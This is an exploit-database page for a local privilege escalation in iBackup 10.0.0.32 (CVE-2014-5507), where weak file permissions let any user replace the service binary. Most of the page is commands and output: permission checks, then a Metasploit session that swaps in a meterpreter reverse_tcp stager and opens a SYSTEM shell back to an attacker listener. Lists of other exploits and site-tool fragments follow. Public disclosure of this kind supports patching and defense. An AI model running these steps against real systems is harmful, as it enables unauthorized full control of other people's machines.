Menu

Search for hundreds of thousands of exploits

"iBackup 10.0.0.32 - Local Privilege Escalation"

Author

Exploit author

"Glafkos Charalambous"

Platform

Exploit platform

windows

Release date

Exploit published date

2014-10-22

Download file

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
# Exploit Title: iBackup <= 10.0.0.32 Local Privilege Escalation
# Date: 23/01/2014
# Author: Glafkos Charalambous <glafkos.charalambous[at]unithreat.com>
# Version: 10.0.0.32
# Vendor: IBackup
# Vendor URL: https://www.ibackup.com/
# CVE-2014-5507


Vulnerability Details
There are weak permissions for IBackupWindows default installation where everyone is allowed to change 
the ib_service.exe with an executable of their choice. When the service restarts or the system reboots
the attacker payload will execute on the system with SYSTEM privileges.


C:\Users\0x414141>icacls "C:\Program Files\IBackupWindows\ib_service.exe"
C:\Program Files\IBackupWindows\ib_service.exe Everyone:(I)(F)
                                               NT AUTHORITY\SYSTEM:(I)(F)
                                               BUILTIN\Administrators:(I)(F)
                                               BUILTIN\Users:(I)(RX)

Successfully processed 1 files; Failed processing 0 files


C:\Users\0x414141>sc qc IBService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: IBService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\Program Files\IBackupWindows\ib_service.exe"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : IBackup Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem



msf exploit(service_permissions) > sessions 

Active sessions
===============

  Id  Type                   Information                    Connection
  --  ----                   -----------                    ----------
  1   meterpreter x86/win32  0x414141-PC\0x414141 @ 0x414141-PC  192.168.0.100:8443 -> 192.168.0.102:1158 (192.168.0.102)



msf exploit(service_permissions) > show options 

Module options (exploit/windows/local/service_permissions):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   AGGRESSIVE  true             no        Exploit as many services as possible (dangerous)
   SESSION     1                yes       The session to run this module on.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (accepted: seh, thread, process, none)
   LHOST     192.168.0.100    yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(service_permissions) > exploit 

[*] Started reverse handler on 192.168.0.100:4444 
[*] Meterpreter stager executable 15872 bytes long being uploaded..
[*] Trying to add a new service...
[*] No privs to create a service...
[*] Trying to find weak permissions in existing services..
[*] IBService has weak file permissions - C:\Program Files\IBackupWindows\ib_service.exe moved to C:\Program Files\IBackupWindows\ib_service.exe.bak and replaced.
[*] Restarting IBService
[*] Could not restart IBService. Wait for a reboot. (or force one yourself)

Upon Reboot or Service Restart

[*] Sending stage (770048 bytes) to 192.168.0.102
[*] Meterpreter session 2 opened (192.168.0.100:4444 -> 192.168.0.102:14852) at 2014-07-21 00:52:36 +0300
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > background 
[*] Backgrounding session 2...

msf exploit(service_permissions) > sessions -l

Active sessions
===============

  Id  Type                   Information                       Connection
  --  ----                   -----------                       ----------
  1   meterpreter x86/win32  0x414141-PC\0x414141 @ 0x414141-PC  192.168.0.100:8443 -> 192.168.0.102:1158 (192.168.0.102)
  2   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ 0x414141-PC  192.168.0.100:4444 -> 192.168.0.102:14852 (192.168.0.102)
Release Date Title Type Platform Author
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "Bakeshop Online Ordering System 1.0 - 'Owner' Persistent Cross-site scripting" webapps multiple "Parshwa Bhavsar"
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "ILIAS Learning Management System 4.3 - SSRF" webapps multiple Dot
Release Date Title Type Platform Author
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS" webapps windows "Amin Rawah"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-01 "Global Registration Service 1.0.0.3 - 'GREGsvc.exe' Unquoted Service Path" local windows "Emmanuel Lujan"
2020-12-01 "EPSON Status Monitor 3 'EPSON_PM_RPCV4_06' - Unquoted Service Path" local windows SamAlucard
2020-12-01 "Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path" local windows "Metin Yunus Kandemir"
2020-12-01 "10-Strike Network Inventory Explorer 8.65 - Buffer Overflow (SEH)" local windows Sectechs
2020-12-01 "Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path" local windows Jok3r
2020-11-30 "YATinyWinFTP - Denial of Service (PoC)" remote windows strider
Release Date Title Type Platform Author
2017-12-27 "DotNetNuke DreamSlider 01.01.02 - Arbitrary File Download (Metasploit)" webapps aspx "Glafkos Charalambous"
2015-09-08 "Cisco Sourcefire User Agent 2.2 - Insecure File Permissions" local windows "Glafkos Charalambous"
2015-03-14 "Intel Network Adapter Diagnostic Driver - IOCTL Handling" dos windows "Glafkos Charalambous"
2015-01-22 "Cisco Ironport Appliances - Privilege Escalation" remote hardware "Glafkos Charalambous"
2014-10-22 "DotNetNuke DNNspot Store 3.0.0 - Arbitrary File Upload (Metasploit)" webapps windows "Glafkos Charalambous"
2014-10-22 "iBackup 10.0.0.32 - Local Privilege Escalation" local windows "Glafkos Charalambous"
2013-06-24 "Alienvault Open Source SIEM (OSSIM) 4.1 - Multiple SQL Injection Vulnerabilities" webapps php "Glafkos Charalambous"
2012-09-20 "Thomson Wireless VoIP Cable Modem - Authentication Bypass" webapps hardware "Glafkos Charalambous"
2011-06-04 "OpenDrive 1.3.141 - Local Password Disclosure" local windows "Glafkos Charalambous"
2011-06-04 "Xitami Web Server 2.5b4 - Remote Buffer Overflow (Egghunter)" remote windows "Glafkos Charalambous"
2010-08-25 "Adobe Premier Pro CS4 - 'ibfs32.dll' DLL Hijacking" local windows "Glafkos Charalambous"
2010-08-25 "Adobe InDesign CS4 - 'ibfs32.dll' DLL Hijacking" local windows "Glafkos Charalambous"
2010-08-25 "Skype 4.2.0.169 - 'wab32.dll' DLL Hijacking" local windows "Glafkos Charalambous"
2010-08-25 "Adobe On Location CS4 - 'ibfs32.dll' DLL Hijacking" local windows "Glafkos Charalambous"
2010-08-25 "Adobe Device Central CS5 - 'qtcf.dll' DLL Hijacking" local windows "Glafkos Charalambous"
2010-08-25 "Adobe Illustrator CS4 - 'aires.dll' DLL Hijacking" local windows "Glafkos Charalambous"
2010-08-24 "TeamViewer 5.0.8703 - 'dwmapi.dll' DLL Hijacking" local windows "Glafkos Charalambous"
2010-08-24 "Adobe Dreamweaver CS4 - 'ibfs32.dll' DLL Hijacking" local windows "Glafkos Charalambous"
2010-08-24 "Mozilla Firefox 3.6.8 - 'dwmapi.dll' DLL Hijacking" local windows "Glafkos Charalambous"
2010-08-17 "Triologic Media Player 8 - '.m3u' Universal Unicode Local Buffer Overflow (SEH)" local windows "Glafkos Charalambous"
2010-08-16 "MUSE 4.9.0.006 - '.m3u' Local Buffer Overflow" local windows "Glafkos Charalambous"
2010-08-16 "MUSE 4.9.0.006 - '.pls' Universal Local Buffer Overflow (SEH)" local windows "Glafkos Charalambous"
2010-08-11 "EasyFTP Server 1.7.0.11 - (Authenticated) Multiple Commands Remote Buffer Overflows" remote windows "Glafkos Charalambous"
2009-01-11 "DZcms 3.1 - SQL Injection" webapps php "Glafkos Charalambous"
2008-11-24 "WebStudio CMS - Blind SQL Injection" webapps php "Glafkos Charalambous"
2007-06-07 "WMSCMS 2.0 - Multiple Cross-Site Scripting Vulnerabilities" webapps php "Glafkos Charalambous"
2007-06-04 "WebStudio CMS - 'index.php' Cross-Site Scripting" webapps php "Glafkos Charalambous"
2007-06-01 "Evenzia Content Management Systems (CMS) - Cross-Site Scripting" webapps php "Glafkos Charalambous" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected